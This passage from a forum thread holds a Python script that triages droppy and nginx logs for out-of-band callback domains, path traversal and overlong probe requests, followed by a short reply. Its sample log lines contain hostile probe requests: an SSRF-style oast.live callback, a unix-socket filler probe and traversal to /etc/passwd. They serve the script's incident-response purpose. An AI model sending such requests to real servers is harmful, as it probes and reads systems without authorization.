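# Callback domains of interactsh-style out-of-band scanners (interact.sh and the oast.* family).
OAST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)*(?:interact\.sh|oast\.(?:live|fun|pro|me|site|online))\b", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
MAX_REQUEST_LEN = 2048

# droppy-style line as posted in the thread:
#   2022-06-05 00:48:18 [INFO] 1.2.3.4:34090 GET /path [401] [1ms],
DROPPY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \[\w+\] (?P<ip>[\d.]+):\d+ "
    r"(?P<method>[A-Z]+) (?P<path>\S+) \[(?P<status>\d{3})\]")
# nginx "combined" access log, which the reverse proxy in front writes for the same request.
NGINX_RE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


@dataclass
class Hit:
    ts: str
    ip: str
    path: str
    status: str
    reasons: List[str]


def classify(path: str) -> List[str]:
    """Reasons a request path deserves a look; an empty list means nothing matched."""
    reasons = []
    decoded = unquote(unquote(path))  # twice, so %252e%252e (double-encoded ..) is caught too
    if OAST_RE.search(decoded):
        reasons.append("oast-callback")
    if TRAVERSAL_RE.search(decoded):
        reasons.append("path-traversal")
    if len(path) > MAX_REQUEST_LEN or re.search(r"(.)\1{200,}", path):
        reasons.append("overlong-filler")  # the /?unix:AAAA... style probe
    return reasons


def parse_line(line: str) -> Optional[Dict[str, str]]:
    for rx in (DROPPY_RE, NGINX_RE):
        m = rx.match(line)
        if m:
            return m.groupdict()
    return None


def triage(lines) -> List[Hit]:
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["path"])
        if reasons:
            hits.append(Hit(rec["ts"], rec["ip"], rec["path"][:80], rec["status"], reasons))
    return hits


def summarize(hits: List[Hit]) -> Dict[str, Dict]:
    """Per source IP: hit count, first/last seen (in log order) and the union of reasons."""
    out: Dict[str, Dict] = OrderedDict()
    for h in hits:
        s = out.setdefault(h.ip, {"count": 0, "first": h.ts, "last": h.ts, "reasons": set()})
        s["count"] += 1
        s["last"] = h.ts
        s["reasons"].update(h.reasons)
    return {ip: {**s, "reasons": sorted(s["reasons"])} for ip, s in out.items()}


# Constructed sample lines (documentation IPs, made-up OAST label) shaped like the thread's log.
SAMPLE_LOG = [
    "2022-06-05 00:48:18 [INFO] 203.0.113.7:34090 GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://c1f2example.oast.live [401] [1ms],",
    "2022-06-05 00:48:19 [INFO] 203.0.113.7:34091 GET /?unix:" + "A" * 3000 + "|http://interact.sh/ [400] [0ms]",
    "2022-06-05 00:50:02 [INFO] 198.51.100.9:41234 GET /_/files/..%2f..%2f..%2fetc/passwd [200] [3ms],",
    "2022-06-05 00:51:10 [INFO] 192.0.2.5:55000 GET /index.html [200] [1ms],",
    '203.0.113.7 - - [05/Jun/2022:00:52:00 +0000] "GET /files/..%252f..%252fconfig/nginx/site-confs HTTP/1.1" 404 162 "-" "curl/7.81.0"',
    "garbage that is not a log line",
]

if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(h.ts, h.ip, h.status, ",".join(h.reasons), h.path)
    for ip, s in summarize(hits).items():
        print(ip, s)
```

The droppy timestamp and the nginx one differ in format, so first/last seen is taken in log order rather than by parsing dates; feed the files in chronological order. A traversal hit that returned 200 is the line to pull first, because it says what was read, and the neighbouring lines from the same IP are where to look for the request that planted the xt directories.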
 

sharpshooter

Registered
If anyone's interested, here are all the files that were created:
It turned out WordPress was the hole.
 
